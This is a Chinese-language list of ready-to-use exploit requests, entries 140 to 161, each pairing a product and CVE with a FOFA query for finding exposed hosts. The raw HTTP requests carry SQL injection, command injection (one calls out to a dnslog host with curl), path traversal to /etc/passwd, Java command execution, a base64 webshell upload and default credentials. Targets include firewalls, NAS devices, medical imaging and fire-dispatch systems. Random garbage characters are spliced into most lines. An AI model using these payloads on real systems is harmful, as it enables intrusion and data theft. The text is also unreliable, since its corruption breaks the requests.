GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
6 i; S* v" }$ V$ I& vHost: x.x.x.x
, ?$ u2 A0 }* v, z7 ~- w& A' uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
3 [/ Y! Z; P+ K( ]- f) nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 F; `8 w% B+ ~; N) ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 b N; c# _2 f! L/ ]# XAccept-Encoding: gzip, deflate, br
" f# y4 }8 e/ W1 a! G. YConnection: close
. d7 v$ K8 \1 S3 b2 r" B5 B- s, a% ZCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk5 y4 |% f, e6 ?" w J
Upgrade-Insecure-Requests: 14 ?. R- {& G* C
2 i: Z. D" ?; e" _1 M$ ]1 O& o5 H% d, u) C
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入3 |3 h( Q) G2 n
CVE-2024-2566
1 M' U3 ?% c' kFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
) N# r; p- U6 B6 l' e5 b0 K. rGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
: s* _' L5 O. F V- y* ?+ dHost: x.x.x.x
$ o7 k \2 w0 w9 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- O6 q* y( f8 Z! }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 m8 D; Y* l5 x" I/ a8 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! N: @% h5 I4 y
Accept-Encoding: gzip, deflate, br
4 L# x' P7 e8 y9 D: H' gConnection: close, t0 D# Q k- |/ c8 D
Cookie: authcode=h8g9" p/ x! T: X/ i) B# q2 I: F2 O
Upgrade-Insecure-Requests: 1
" o" }5 x8 t& f6 o) V) z1 |8 P8 J/ D0 j. a
! Y6 c+ ~, T9 a$ @+ a141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
! y, ?3 W) Y& u! ~' r5 ZFOFA:body="指挥调度管理平台"
# J4 u; `, B- cPOST /app/ext/ajax_users.php HTTP/1.1$ G' `7 c5 g! {8 x7 M+ y
Host: your-ip
0 A' i0 r- l" b w4 LUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info% e7 M3 ?+ z2 g5 X0 g0 _
Content-Type: application/x-www-form-urlencoded3 @4 T& u$ S9 ~
; a S5 [7 d0 g4 y
# T% q( n5 u* r9 l4 h* s) Y7 U/ Udep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -0 L: f2 M- C! a. Y. y, k$ }
- u+ N# P9 ]' p1 B- |
* Z( a# G" p3 l* X
142. CMSV6车辆监控平台系统中存在弱密码) o6 c# \9 I& [$ q: s
CVE-2024-296664 Z/ G) p( M' {0 `2 i1 ` W4 z K
FOFA:body="/808gps/"/ w: P( }9 f4 G" i! i
admin/admin0 ?5 k+ l7 a' O6 |
143. Netis WF2780 v2.1.40144 远程命令执行
; i4 E1 k! [7 W0 e9 y5 h4 |$ q' k- K) mCVE-2024-258501 l3 g& q5 |0 g3 @" y3 v3 X i2 B
FOFA:title='AP setup' && header='netis'9 j: ^, }% I; ]; R2 L o6 H5 B& K
PAYLOAD( A, V, c& l# ?6 Q
2 n" F, Y6 N/ t, z: n144. D-Link nas_sharing.cgi 命令注入# `+ b) o" o2 K( W- D) `7 J
FOFA:app="D_Link-DNS-ShareCenter"
# y0 |3 m- I3 u6 C7 esystem参数用于传要执行的命令
9 y: x1 R7 L( w* D9 y1 J/ OGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
- B& ~$ T( Q. SHost: x.x.x.x
7 Z" \; @$ r0 |* k/ |: G8 BUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
# N% b1 O8 Z" `% dConnection: close
8 N: r& d& I! { G- J$ U) `5 kAccept: */*2 L( O$ k g8 s3 w
Accept-Language: en
- O a$ U) t* S( J) NAccept-Encoding: gzip0 h4 t0 w, F8 e0 t7 h0 @% u* J1 B
, I8 b* t M2 l; w5 g' n# o% F! Y$ t A3 t; X- F$ t
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入: y t" W' _0 c
CVE-2024-34009 B) w0 J1 R9 P: V* I4 Z3 L
FOFA:icon_hash="-631559155"
6 z- \% u3 D: HGET /global-protect/login.esp HTTP/1.1
. X' R- w* j' P; P0 U2 Z' GHost: 192.168.30.112:1005
% D" E8 U' G; |6 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84+ i" M+ B2 [- d2 x+ M
Connection: close3 Q0 C5 P }2 p7 W$ j$ K
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;- e6 Z( b( w# A; m% c
Accept-Encoding: gzip6 O% @6 E+ g9 j# v; H1 I# m
& N) U" V* V$ k" r& O2 S9 G$ b- S: }2 D% a( A
146. MajorDoMo thumb.php 未授权远程代码执行
% T! }- R! T' PCNVD-2024-021755 E3 z9 V8 x; r# X
FOFA:app="MajordomoSL"
+ y q( M, \' W& AGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1% _& K$ A( k' q& d
Host: x.x.x.x
|7 o' B: m/ z- n" cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' X6 `: K8 J. ~" i d1 IAccept-Charset: utf-82 o4 a' y% T. Y0 d. t. j
Accept-Encoding: gzip, deflate
9 M* m: x* v4 J: R9 Y! Z! d$ D$ LConnection: close
& K5 H' w' S' K! r, P1 X- N- m! `2 X0 H$ M- N+ m8 ?
# p1 P+ f% s, }. y; U147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
5 {6 r& }' n7 q- C. z% o( r2 lCVE-2024-32399
/ u. t2 N1 Z* g# J, nFOFA:body="RaidenMAILD"
& U; i9 A+ k- |GET /webeditor/../../../windows/win.ini HTTP/1.18 A0 z! E# S8 ?. P6 X, d* g
Host: 127.0.0.1:81- S. f0 w9 n2 P. o+ a
Cache-Control: max-age=05 E* |9 ?7 W/ T' O* k) m4 v
Connection: close
- W4 B* ?8 n9 U: L0 k; R- @8 {2 E! e
. D. T- l' ~+ I% ]5 i1 V& m148. CrushFTP 认证绕过模板注入
7 T8 ]' B: @2 C4 n5 u2 ]$ i; qCVE-2024-4040
- {) ~- z7 f' I; tFOFA:body="CrushFTP"# Z1 H: h% Q& ]
PAYLOAD. t& Y* d1 o: g$ X0 D: S
8 R( P. k* Y+ K; |; q8 _
149. AJ-Report开源数据大屏存在远程命令执行3 S9 s% i1 u3 W" a. D3 T
FOFA:title="AJ-Report"
$ y- e2 y% F; c, K [+ L; l( Q8 o, x) e& A7 p5 ^
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
. i7 E) [* ?4 `2 i( l6 j8 HHost: x.x.x.x
1 H1 V: U, c$ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. y* e7 p' @1 j; U4 v( ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. f! O$ e4 y3 A2 F3 L: q& N$ zAccept-Encoding: gzip, deflate, br! j) ]8 m( u e" n
Accept-Language: zh-CN,zh;q=0.9
) S) L3 y; x% H$ B2 t0 g4 W( sContent-Type: application/json;charset=UTF-8% {3 {! v& l; c0 b) R
Connection: close7 |4 m8 ^' Y b; g
) J; T1 _& R6 g1 c{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
* Z, _! H. |6 G( F
1 s% { d6 L2 t: c* D4 I150. AJ-Report 1.4.0 认证绕过与远程代码执行3 P+ U' E, p( n, j: y* u
FOFA:title="AJ-Report"7 s2 O: m, E% X( }% S
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1$ V& m1 ~: |# A8 K
Host: x.x.x.x
; o! y+ j9 `3 u; u' |+ OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 g! {4 o+ i- T6 U+ H1 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 z5 g' [" V; h8 N4 e) b7 oAccept-Encoding: gzip, deflate, br
/ j/ `/ ^5 ?! ?& }Accept-Language: zh-CN,zh;q=0.9
) X5 g9 Z H: ~Content-Type: application/json;charset=UTF-8
) i1 x) v. C4 G0 l9 rConnection: close3 U* i2 M, t6 [. k; G7 ^$ F
Content-Length: 339
/ p- z8 S' s, u" M6 M4 b, \7 [' E3 N( U
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}9 L1 Z3 N* ]9 K: i
: v! @6 v" L6 G+ s* L
0 p3 Z+ B' n7 j151. AJ-Report 1.4.1 pageList sql注入
; H" I3 D+ W6 @6 T5 rFOFA:title="AJ-Report"
2 G* E# M* e9 b5 m2 U" qGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
8 K. v) Q* @+ e; n9 s$ m6 oHost: x.x.x.x' `; V' u9 e8 D# Z! M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& I: W3 m* r8 c1 v& wConnection: close
1 W* m! ?: T5 D$ E) |- xAccept-Encoding: gzip" @7 Q1 }. U: O- s& ~6 H9 v
. ~% h& H$ s: j- D6 a; u+ T! Z
+ e% }& x9 D( m6 |( H2 w/ ]. g
152. Progress Kemp LoadMaster 远程命令执行2 s9 k% N/ P3 H; T1 n
CVE-2024-1212$ w3 u8 m/ W& h6 L+ @, @9 P3 @
LoadMaster <= 7.2.59.2 (GA)
* E/ U3 e" @+ U- XLoadMaster<=7.2.54.8 (LTSF); `7 C7 o5 p/ c2 s& L+ }6 S
LoadMaster <= 7.2.48.10 (LTS)
: c0 `3 l8 X3 v& XFOFA:body="LoadMaster"
+ ?% \! b, | t A- N: S8 UJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
' f# H! X7 x' c% P2 W rGET /access/set?param=enableapi&value=1 HTTP/1.1" q$ ]# f2 V0 }) T/ q2 Z+ R
Host: x.x.x.x( N( p6 _3 i+ L- G8 _' n- b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1% j/ ~ e3 k' A* ~# `+ p6 U- [( m( E
Connection: close3 D: x0 t' s) @( T
Accept: */*
( u4 E+ h7 i' m5 f1 J# EAccept-Language: en3 ]" @; U0 l9 r3 W
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=9 [' }. a+ M; f' W" X
Accept-Encoding: gzip* b5 V1 I: D4 C9 y7 O j5 Z
7 h! c9 l. l' z+ w r: L
5 B/ F5 v ~4 x
153. gradio任意文件读取# x$ o4 T' }; B& J6 z% B. _ {# \- O
CVE-2024-1561FOFA:body="__gradio_mode__") T& x( S3 |9 w. _
第一步,请求/config文件获取componets的id
) @! I) {/ N( t& l# U8 fhttp://x.x.x.x/config4 J; U" b, S3 h2 y) D) u& u% G x
c! j7 n! f1 S% \7 e/ q
0 T/ M# W$ ?, M8 _8 ]0 K$ D# h第二步,将/etc/passwd的内容写入到一个临时文件& ]/ ^/ t+ p8 e' T
POST /component_server HTTP/1.1
( k' w- I( s7 L8 qHost: x.x.x.x: N2 F& X# k# Y) g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
! n. h+ K& q) K' p" u( }Connection: close! ?& y! y; ?& q8 W
Content-Length: 115
. @ q N+ J. y3 \* }/ D% F! zContent-Type: application/json. B( X' I0 x9 \
Accept-Encoding: gzip, @# v) Z; @1 `" R
( y9 i; ^" K* b; Y1 _- E
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
7 d' N$ Z, O g% t2 s0 |/ [+ }5 e
+ G+ W7 d. z- N6 w3 h
第三步访问4 A9 c" v, D# Y/ I
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
+ d6 v( S: y! @- c8 y1 j7 M D3 ]9 N! D6 s& V
% D: R, _( N, J$ t! O+ Q5 s9 O7 V154. 天维尔消防救援作战调度平台 SQL注入! d7 \( h8 C% D% N, c
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"4 h% a8 N4 m7 H8 J! ?6 K8 X: |
POST /twms-service-mfs/mfsNotice/page HTTP/1.15 t9 [; J. Z" K; K- z+ M# k8 S
Host: x.x.x.x5 }! z R! s$ S% O
Content-Length: 106( [4 ?& o; l' d" |: e: K
Cache-Control: max-age=0
1 U$ y& X/ H. G5 S, Y" M5 T6 eUpgrade-Insecure-Requests: 1. l D* \% u1 F) A* K/ @2 |, x: i
Origin: http://x.x.x.x
, L8 A& Q# B; b# \/ \+ tContent-Type: application/json& d( j3 b: J1 w1 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.362 M: w. o* |: a* }4 i4 M/ p$ G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* I- s- `$ r* }# WReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
V) s% `; o% p' N7 D. F* e* X# CAccept-Encoding: gzip, deflate$ c' p9 R' L5 k5 D5 V" `
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7% ?1 ~9 \0 X. {+ @; }( Y
Connection: close* u/ v4 s+ [/ P3 \
( u9 l3 J$ o8 I* N5 t0 g8 B{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
2 g0 u" j$ v2 i; O5 m
% P3 M2 a* o, B" p9 s+ V0 P( p4 _ |9 r& }! d1 b
155. 六零导航页 file.php 任意文件上传
) n3 w u6 B, Q- o/ F) KCVE-2024-34982" u/ ]6 x' b6 B- D$ o
FOFA:title=="上网导航 - LyLme Spage", [6 v1 p3 ~+ p( L
POST /include/file.php HTTP/1.1+ j0 v" A: A4 N9 p- O3 f
Host: x.x.x.x1 }+ a9 `# w! v" R' D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0# `! c# ~6 f& B5 i# d
Connection: close
2 i. @# o9 _1 K: |Content-Length: 2327 u5 O* p3 ]' N1 I% C! y8 d. M) R, p
Accept: application/json, text/javascript, */*; q=0.01
; W9 z z. J0 N" Q7 J& A) mAccept-Encoding: gzip, deflate, br6 N( c2 y; ~+ s% d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ j* \/ L6 h- D5 F5 I7 B
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f, q4 P0 H' g ]2 K
X-Requested-With: XMLHttpRequest; Y C- }! r& c% n0 |- r
. b) a. \2 F! r& c4 R9 W-----------------------------qttl7vemrsold314zg0f
~; N% @3 Z X6 f _& _Content-Disposition: form-data; name="file"; filename="test.php"
9 e. A7 I9 G; O# z9 w4 ]$ z. sContent-Type: image/png
- W2 g2 |' c) B' N! p |
2 N9 ~7 I( J4 D2 o<?php phpinfo();unlink(__FILE__);?>' b. W; M) Y1 i- _9 s
-----------------------------qttl7vemrsold314zg0f--
3 A0 m( F) P) ?4 Y8 \* l
% U1 w8 T: w! j, q$ X7 M D. R! L" e7 a, M' [, r
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
2 Y) V& w4 M% B# i- n9 o$ O" ^# k1 d% w- C
156. TBK DVR-4104/DVR-4216 操作系统命令注入# ?! T6 Q4 C( @2 f' m# c- w
CVE-2024-3721
/ y% W) X2 D6 u6 v" [7 rFOFA:"Location: /login.rsp"
. J7 o$ n) A( z6 w& G; O( @3 n·TBK DVR-4104
: E- _! T0 o: l·TBK DVR-4216
9 E! u' T$ p' a; @2 ncurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1". F v- u4 U9 J4 k
+ k' h/ n; K A- y
( I3 x3 B% K. Y* P, JPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
, \2 {5 O) b6 s+ z- T1 ~Host: x.x.x.x
, @+ s( c7 ]+ B. ~/ [" U% S i& J9 tUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 W$ G5 u6 z, X. U% t
Connection: close
] [; f% s3 c; T7 PContent-Length: 0
" c# l9 q9 P" N9 \* h+ o3 GCookie: uid=17 m- z: x; p6 r3 Y9 n- ?# Z8 m
Accept-Encoding: gzip
3 v1 G; ?& l" c8 a7 k8 P+ L) A _4 [2 M, z
6 `# o; E! ~) `" R0 ?$ d157. 美特CRM upload.jsp 任意文件上传! I- h# |0 V7 q* ?; ?
CNVD-2023-069715 W, f# C* `) E! F
FOFA:body="/common/scripts/basic.js"7 \! I# ?0 t. x0 M" h2 Q3 C$ H
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
* i# _3 A. r7 J" HHost: x.x.x.x3 U m1 p' h. F# W+ i. g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" A! \" _8 u# j. E+ l
Content-Length: 709
+ E G0 k. H; Z, Y1 M/ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ ?' s3 S5 A6 Y4 U
Accept-Encoding: gzip, deflate8 _' |4 K( C" a6 O0 q
Accept-Language: zh-CN,zh;q=0.9
6 T! a( F/ }: ~* b6 |5 ZCache-Control: max-age=0
/ I! e4 A4 E- n" C GConnection: close
" H1 |+ _; v7 d9 c# h& hContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN( W: Z: t7 b9 m
Upgrade-Insecure-Requests: 1
r& j( U$ W& x, q
3 s% C# h( c, V7 V------WebKitFormBoundary1imovELzPsfzp5dN
/ N h! f+ V9 l9 q- _6 vContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
8 A. D: C' g' ^Content-Type: application/octet-stream% p5 H' D6 C+ I/ I0 q+ G
& Y5 D1 V" w! W3 |4 Z) T# @3 T
nyhelxrutzwhrsvsrafb
9 \& g" D$ {# c- f; d; D" ~2 m------WebKitFormBoundary1imovELzPsfzp5dN
1 M# W7 `9 l9 E: m* R+ f* K( [$ U- qContent-Disposition: form-data; name="key"
2 C7 _7 o. H7 A* O# s7 D
) R* m3 a! t6 V0 dnull
3 v6 g+ Z" Y8 D; j$ J4 g------WebKitFormBoundary1imovELzPsfzp5dN' ]8 h6 T x4 g2 G, q( H
Content-Disposition: form-data; name="form"
2 T. | [5 e% u4 p* X$ m4 f/ ]( n! Q0 w5 f" m
null
) g0 N2 W# T. t9 [) F P------WebKitFormBoundary1imovELzPsfzp5dN
3 N1 V2 X" ?- J" ]Content-Disposition: form-data; name="field"8 a5 l- t/ H |
6 l! q6 v7 O/ J3 ^3 \null
- d6 G, l3 \. u |& p------WebKitFormBoundary1imovELzPsfzp5dN- ~& C& g4 K5 ~
Content-Disposition: form-data; name="filetitile"
: l& H4 x& d) n; h+ P- ]# l8 z# v& N0 q! j/ u
null
1 p e0 Q U' ?2 z* d------WebKitFormBoundary1imovELzPsfzp5dN# Q" @* C L( d0 h/ z
Content-Disposition: form-data; name="filefolder"
, J6 u7 J2 [- o4 }/ d8 j" I: r% @4 G& E' K% W# b2 q
null J9 s0 M' ~: L6 b$ t$ t/ _
------WebKitFormBoundary1imovELzPsfzp5dN--
+ h; k: A' Q9 v; W; v
) R( Q1 F w5 g$ C/ a' i( B0 q
. Q6 h, t( u" a2 I1 _$ r7 Jhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp9 R" I, D2 T; `/ K' Z% {. B
* `0 c7 }4 \0 Q7 k3 K" J }' K- k4 _
158. Mura-CMS-processAsyncObject存在SQL注入
" G2 L1 [: R; ~% L, r9 UCVE-2024-32640
@- f4 Y- i0 A3 |* I! JFOFA:"Generator: Masa CMS"
+ s" d3 u% c/ S$ t, d; _! [POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
( c( v8 K+ j+ fHost: {{Hostname}}- _2 q, L- _$ F+ f
Content-Type: application/x-www-form-urlencoded$ m7 s ~9 a$ e% |
, }% y d. \4 s* n! X$ C0 S+ z
object=displayregion&contenthistid=x\'&previewid=1
% g5 w- w- Z3 u. G3 x# Y5 H" ]/ m* B: X" z
1 L$ i7 B- ? Q& _$ f159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传# z8 D' @' v3 v' r2 W; [
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
; p. |) b" f# o) pPOST /webservices/WebJobUpload.asmx HTTP/1.1
$ @0 Y- }' x. C: R3 ^% V" F' OHost: x.x.x.x) i; s0 {4 w+ Q2 [. k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36* @+ f+ Q, s+ i: X% C
Content-Length: 1080* @ T$ X3 P e- [- G4 u7 G2 K
Accept-Encoding: gzip, deflate
# `" B4 ?) {: ~8 e* a; ]$ TConnection: close
% f% [+ G) J+ d2 b, n) J3 r7 F5 TContent-Type: text/xml; charset=utf-8
7 E& J5 m5 z4 V% \* L/ pSoapaction: "http://rainier/jobUpload" x# w' A8 \- t9 Z- Q& N
, D# i V& F: d) A( h
<?xml version="1.0" encoding="utf-8"?>
' X; U* S1 l% L2 X<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
/ w7 {. I: l4 _ Z6 u& C5 d. u<soap:Body>
) V3 }- z5 x' C4 P- g( u- u<jobUpload xmlns="http://rainier">$ i$ }: ~ c, q, f& T
<vcode>1</vcode>4 y+ h( X* }( S3 R: B( ~& k
<subFolder></subFolder>3 i+ A1 ^8 f/ u/ v% q# J
<fileName>abcrce.asmx</fileName>9 k. |6 J! H2 ~7 M- \
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
4 n' {4 t+ O" _; B( W" h</jobUpload>6 M9 x% x6 A- ~5 k8 Z
</soap:Body>7 K+ G6 C% E- R3 W+ R4 }& V
</soap:Envelope>! f$ e: m F; G2 N# _. L' {- E
8 g' `6 k0 a0 a8 E& o' P
% W- j/ L8 {4 J/ q( e3 L/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
0 w( I9 C1 f, @9 P4 s8 j
& s: W- T; T5 J* n( s" m% [6 j
160. Sonatype Nexus Repository 3目录遍历与文件读取
* A4 @7 [/ @" fCVE-2024-4956+ x2 @$ ?6 t' K; B: F ]1 g! k3 U
FOFA:title="Nexus Repository Manager"
) t* ~- _2 ~5 ]' D9 _# k8 K- @GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1. [" V& F6 c7 _
Host: x.x.x.x
) y$ n: c8 B- M; oUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
2 K( U3 H6 b5 X/ Q) p5 f {Connection: close
' s- F% I! X: H2 f9 D7 dAccept: */*! K5 y9 c4 }8 m; y) Y
Accept-Language: en/ i! G( H b {$ x8 i1 Q8 x
Accept-Encoding: gzip
# s9 C7 W e: t; y, T' z
& Z; s4 ?5 B# F0 J S
8 M3 {7 w, `. ~: M6 D* \) r6 N161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传 h/ {" ]( c. W" |# W: Q0 _: `0 l
FOFA:body="/KT_Css/qd_defaul.css"
2 W' f9 h5 B7 i/ k: X8 R- X3 P+ q第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
) y( @& R/ o, ^9 |1 m. HPOST /Webservice.asmx HTTP/1.1
2 W' G# k- G7 w( r" LHost: x.x.x.x0 b- n- F6 f, U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36% s, q! L& V' C3 P
Connection: close
* N, Q& d# i7 Y# A k% ~Content-Length: 445/ d |9 }7 ?! d( y1 m' B8 x1 H
Content-Type: text/xml
, N) J$ n) S! o% O, F: BAccept-Encoding: gzip- r6 z' L% h- P
. d. x8 h4 Q, N; P1 n. i) ^. I<?xml version="1.0" encoding="utf-8"?>& S+ N" o1 m, A5 Q2 o& X# l
<soap:Envelope xmlns:xsi="8 h5 X' Y3 M2 G% B# ~8 d
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema": S! M- N$ Z& x/ M8 |5 E
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; q$ t- o. H7 \. E5 }& ~<soap:Body>
' l0 ]/ Y _" L<UploadResume xmlns="http://tempuri.org/">) f& N' t0 i; P6 \
<ip>1</ip>
, u+ ?0 D% z" h+ Q2 q: n<fileName>../../../../dizxdell.aspx</fileName>
! a& f7 k0 H, t6 k$ T- N$ z: H<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
: Z6 _: ?+ G1 g# c6 q& d" E<tag>3</tag>
6 m! }! F. \( z8 T</UploadResume>
5 l: L! i8 \2 q( C5 _5 @3 [</soap:Body>' c& e0 w; G9 P0 ]! z. l
</soap:Envelope>4 p& Z' |" E0 H3 g3 Q
" r" B- c w; U5 q$ v
